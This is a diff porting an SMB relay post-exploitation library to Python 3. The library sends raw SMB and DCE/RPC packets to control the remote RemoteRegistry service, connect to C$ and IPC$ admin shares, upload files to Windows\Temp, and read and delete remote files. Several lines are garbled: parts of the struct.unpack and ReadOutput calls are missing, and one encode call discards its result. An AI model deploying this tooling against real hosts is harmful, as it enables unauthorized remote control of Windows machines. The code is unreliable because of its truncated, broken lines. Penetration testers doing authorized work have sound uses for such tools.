- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry")
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLQueryService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to start the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x06\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
-
+ time.sleep(3)
## DCE/RPC SVCCTLCloseService
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to query the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- return data, s, f
+ return data, s, f
###########################
#Stop Winreg Service
###########################
def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLOpenManagerW.
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host)
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##Error handling.
- if data[8:10] == "\x2e\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+ if data[8:10] == b"\x2e\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to create the service\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#ContextHandlerService = data[88:108]
- ContextHandler = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandler = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry")
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to open the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
- ContextHandlerService = data[84:104]
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ ContextHandlerService = data[84:104].decode('latin-1')
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x01\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLQueryService.
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to stop the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x06\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
- if data[8:10] == "\x25\x00":
- if data[len(data)-4:] == "\x05\x00\x00\x00":
- print "[+] Failed to query the service.\n"
+ if data[8:10] == b"\x25\x00":
+ if data[len(data)-4:] == b"\x05\x00\x00\x00":
+ print("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
- head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
- t = SMBTransDCERPC(FID=f,Data=x)
+ t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- return data, s, f
+ return data, s, f
###########################
@@ -1163,23 +1203,23 @@ def StopWinregService(f, host, data, s):
def CloseFID(f, data, s):
##Close FID Request
- if data[8:10] == "\x25\x00":
- head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = CloseRequest(FID = f)
+ if data[8:10] == b"\x25\x00":
+ head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = CloseRequest(FID = f.decode('latin-1'))
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s
def SMBDCERPCCloseFID(f, data, s):
##Close FID Request
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = CloseRequest(FID = f)
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = CloseRequest(FID = f.decode('latin-1'))
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s
@@ -1188,126 +1228,135 @@ def SMBDCERPCCloseFID(f, data, s):
###########################
def SMBOpenFile(Filename, Share, Host, Access, data, s):
+ if isinstance(data, str):
+ data.encode('latin-1')
##Start with a Tree connect on C$
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##OpenAndX.
- if data[8:10] == "\x75\x00":
- head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+ if data[8:10] == b"\x75\x00":
+ head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
t = OpenAndX(File=Filename, OpenFunc="\x01\x00", Flags="\x07\x00", DesiredAccess=Access)
t.calculate()
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- if data[8:10] == "\x2d\x22":
- print "[+] Can't open the file, access is denied (write protected file?)."
+ if data[8:10] == b"\x2d\x22":
+ print("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
- if data[8:10] == "\x2d\x43":
- time.sleep(1)
- head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+ if data[8:10] == b"\x2d\x43":
+ print("[+] Sharing violation, waiting a bit and attempting again.")
+ time.sleep(2)
+ head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
t = OpenAndX(File=Filename, OpenFunc="\x01\x00",DesiredAccess=Access)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- if data[8:10] == "\x2d\x00":##Found all good.
+ if data[8:10] == b"\x2d\x00":##Found all good.
f = data[41:43]
return data, s, f
- if data[8:10] == "\x2d\x34":#not found
+ if data[8:10] == b"\x2d\x34":#not found
time.sleep(2)#maybe still processing the cmd. Be patient, then grab it again.
- head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+ head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
t = OpenAndX(File=Filename, OpenFunc="\x01\x00")
t.calculate()
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##OpenAndX.
- if data[8:10] == "\x2d\x34":
- print "[+] The command failed or took to long to complete."
+ if data[8:10] == b"\x2d\x34":
+ print("[+] The command failed or took to long to complete.")
return data, s
##all good.
- if data[8:10] == "\x2d\x00":
- f = data[41:43]
- return data, s, f
+ if data[8:10] == b"\x2d\x00":
+ f = data[41:43]
+ return data, s, f
###########################
#Open a file for writing
###########################
def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, data, s):
+ if isinstance(data, str):
+ data = data.encode('latin-1')
##Start with a Tree connect on C$
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##NtCreate.
- if data[8:10] == "\x75\x00":
- head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+ if data[8:10] == b"\x75\x00":
+ head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
t = SMBNTCreateData(FileName="Windows\\Temp\\"+Filename, CreateFlags="\x00\x00\x00\x00", AccessMask="\x96\x01\x03\x00",FileAttrib="\x20\x00\x00\x00", ShareAccess="\x00\x00\x00\x00", Disposition = "\x02\x00\x00\x00", CreateOptions="\x44\x00\x00\x00")
t.calculate()
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
- if data[8:10] == "\xa2\x22":
- print "[+] Can't open the file, access is denied (write protected file?)."
+ if data[8:10] == b"\xa2\x22":
+ print("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
- if data[8:10] == "\xa2\x35":
- print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename
+ if data[8:10] == b"\xa2\x35":
+ print("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename)
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
- if data[8:10] == "\xa2\x00":##Found, all good.
+ if data[8:10] == b"\xa2\x00":##Found, all good.
f = data[42:44]
return data, s, f
##OpenAndX.
- if data[8:10] == "\xa2\x34":
- print "[+] The command failed or took to long to complete."
+ if data[8:10] == b"\xa2\x34":
+ print("[+] The command failed or took to long to complete.")
return data, s
##all good.
- if data[8:10] == "\xa2\x00":
- f = data[41:43]
- return data, s, f
+ if data[8:10] == b"\xa2\x00":
+ f = data[41:43]
+ return data, s, f
###########################
#Open an IPC$ channel.
###########################
def SMBOpenPipe(Host, data, s):
+ if isinstance(data, str):
+ data = data.encode('latin-1')
+ else:
+ pass
##Start with a Tree connect on IPC$
- head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s
@@ -1317,11 +1366,11 @@ def SMBOpenPipe(Host, data, s):
def CloseTID(data, s):
##Start with a Tree connect on IPC$
- head = SMBHeader(cmd="\x71",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+ head = SMBHeader(cmd="\x71",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeDisconnect()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s
@@ -1330,58 +1379,60 @@ def CloseTID(data, s):
###########################
def GrabAndRead(f, Filename, data, s):
##ReadRequest.
- if data[8:10] == "\x2d\x00":
- ##grab the filesize from the OpenAndX response.
- filesize = struct.unpack(" 65520.
- first = filesize-65520
- if first <= 65520:
- count_number = 1
- else:
- count_number = int(first/65520)+1
- count = 0
- dataoffset = 0
- bar = 80
- for i in xrange(count_number):
- count = count+1
- alreadydone = int(round(80 * count / float(count_number)))
- pourcent = round(100.0 * count / float(count_number), 1)
- progress = '=' * alreadydone + '-' * (80 - alreadydone)
- sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
- sys.stdout.flush()
- dataoffset = dataoffset + 65520
- data, s, out = ReadOutput(struct.pack("60:
- minutes = Seconds/60
- print 'Downloaded in: %.3g minutes.'%(minutes)
- if Seconds<60:
- print 'Downloaded in: %.3g seconds'%(Seconds)
+ if data[8:10] == b"\x2d\x00":
+ ##grab the filesize from the OpenAndX response.
+ filesize = struct.unpack(" 65520.
+ first = filesize-65520
+ if first <= 65520:
+ count_number = 1
+ else:
+ count_number = int(first/65520)+1
+ count = 0
+ dataoffset = 0
+ bar = 80
+ for i in range(count_number):
+ count = count+1
+ alreadydone = int(round(80 * count / float(count_number)))
+ pourcent = round(100.0 * count / float(count_number), 1)
+ progress = '=' * alreadydone + '-' * (80 - alreadydone)
+ sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
+ sys.stdout.flush()
+ dataoffset = dataoffset + 65520
+ data, s, out = ReadOutput(StructWithLenPython2or3("60:
+ minutes = Seconds/60
+ print('Downloaded in: %.3g minutes.'%(minutes))
+ if Seconds<60:
+ print('Downloaded in: %.3g seconds'%(Seconds))
+ if isinstance(data, str):
+ data = data.encode('latin-1')
##Close Request
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = CloseRequest(FID = f)
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = CloseRequest(FID = f.decode('latin-1'))
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s, Output
@@ -1390,54 +1441,54 @@ def GrabAndRead(f, Filename, data, s):
###########################
def UploadAndWrite(f, FileSize, FileContent, data, s):
##WriteRequest for a small file.
- if data[8:10] == "\xa2\x00" and FileSize <= 29999:
- head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
- t = SMBWriteData(FID=f, Data=FileContent)
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
- data = s.recv(2048)
+ if data[8:10] == b"\xa2\x00" and int(FileSize) <= 29999:
+ head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00")
+ t = SMBWriteData(FID=f.decode('latin-1'), Data=FileContent)
+ t.calculate()
+ packet1 = str(head)+str(t)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
+ data = s.recv(2048)
##WriteRequest for a big file.
- if data[8:10] == "\xa2\x00" and FileSize >= 30000:
- ##How many requests?
- count_number = int(FileSize/30000)+1
- #Do progress bar for large uploads, so the pentester doesn't fall asleep while doing a large SMB write operations..
- dataoffset = 0
- count = 0
- bar = 80
- start_time = time.time()
- print 'File size: %s'%(GetReadableSize(FileSize))
- for i in xrange(count_number):
- count = count+1
- Chunk = FileContent[dataoffset:dataoffset+30000]
- alreadydone = int(round(80 * count / float(count_number)))
- pourcent = round(100.0 * count / float(count_number), 1)
- progress = '=' * alreadydone + '-' * (80 - alreadydone)
- sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
- sys.stdout.flush()
+ if data[8:10] == b"\xa2\x00" and int(FileSize) >= 30000:
+ ##How many requests?
+ count_number = int(FileSize/30000)+1
+ #Do progress bar for large uploads, so the pentester doesn't fall asleep while doing a large SMB write operations..
+ dataoffset = 0
+ count = 0
+ bar = 80
+ start_time = time.time()
+ print('File size: %s'%(GetReadableSize(FileSize)))
+ for i in range(count_number):
+ count = count+1
+ Chunk = FileContent[dataoffset:dataoffset+30000]
+ alreadydone = int(round(80 * count / float(count_number)))
+ pourcent = round(100.0 * count / float(count_number), 1)
+ progress = '=' * alreadydone + '-' * (80 - alreadydone)
+ sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
+ sys.stdout.flush()
- if len(Chunk) == 0:
- pass
- else:
- data, s = WriteOutput(struct.pack("60:
- minutes = Seconds/60
- print 'Uploaded in: %.3g minutes.'%(minutes)
- if Seconds<60:
- print 'Uploaded in: %.3g seconds'%(Seconds)
+ if len(Chunk) == 0:
+ pass
+ else:
+ data, s = WriteOutput(StructWithLenPython2or3("60:
+ minutes = Seconds/60
+ print('Uploaded in: %.3g minutes.'%(minutes))
+ if Seconds<60:
+ print('Uploaded in: %.3g seconds'%(Seconds))
##Close Request
- if data[8:10] == "\x2f\x00":
- head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = CloseRequest(FID = f)
+ if data[8:10] == b"\x2f\x00":
+ head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = CloseRequest(FID = f.decode('latin-1'))
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
return data, s
@@ -1446,622 +1497,577 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
###########################
def ReadAndDelete(f, Filename, data, s):
##ReadRequest.
- if data[8:10] == "\x2d\x00":
- filesize = struct.unpack(" 65520.
- first = filesize-65520
- if first <= 65520:
- count_number = 1
- else:
- count_number = int(first/65520)+1
- count = 0
- dataoffset = 0
- bar = 80
- for i in xrange(count_number):
- count = count+1
- alreadydone = int(round(80 * count / float(count_number)))
- pourcent = round(100.0 * count / float(count_number), 1)
- progress = '=' * alreadydone + '-' * (80 - alreadydone)
- sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
- sys.stdout.flush()
- dataoffset = dataoffset + 65520
- data, s, out = ReadOutput(struct.pack("60:
- minutes = Seconds/60
- print 'Downloaded in: %.3g minutes.\n'%(minutes)
- if Seconds<60:
- print 'Downloaded in: %.3g seconds'%(Seconds)
+ if data[8:10] == b"\x2d\x00":
+ filesize = struct.unpack(" 65520.
+ first = filesize-65520
+ if first <= 65520:
+ count_number = 1
+ else:
+ count_number = int(first/65520)+1
+ count = 0
+ dataoffset = 0
+ bar = 80
+ for i in range(count_number):
+ count = count+1
+ alreadydone = int(round(80 * count / float(count_number)))
+ pourcent = round(100.0 * count / float(count_number), 1)
+ progress = '=' * alreadydone + '-' * (80 - alreadydone)
+ sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%'))
+ sys.stdout.flush()
+ dataoffset = dataoffset + 65520
+ data, s, out = ReadOutput(StructWithLenPython2or3("60:
+ minutes = Seconds/60
+ print('Downloaded in: %.3g minutes.\n'%(minutes))
+ if Seconds<60:
+ print('Downloaded in: %.3g seconds'%(Seconds))
+ if isinstance(data, str):
+ data = data.encode('latin-1')
+
##Close Request
- if data[8:10] == "\x2e\x00":
- head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
- t = CloseRequest(FID = f)
+ if data[8:10] == b"\x2e\x00":
+ head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00")
+ t = CloseRequest(FID = f.decode('latin-1'))
packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
- s.send(buffer1)
+ buffer1 = longueur(packet1)+packet1
+ s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
##DeleteFileRequest.
- if data[8:10] == "\x04\x00":
- head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
- t = DeleteFileRequest(File=Filename)
- t.calculate()
- packet1 = str(head)+str(t)
- buffer1 = longueur(packet1)+packet1
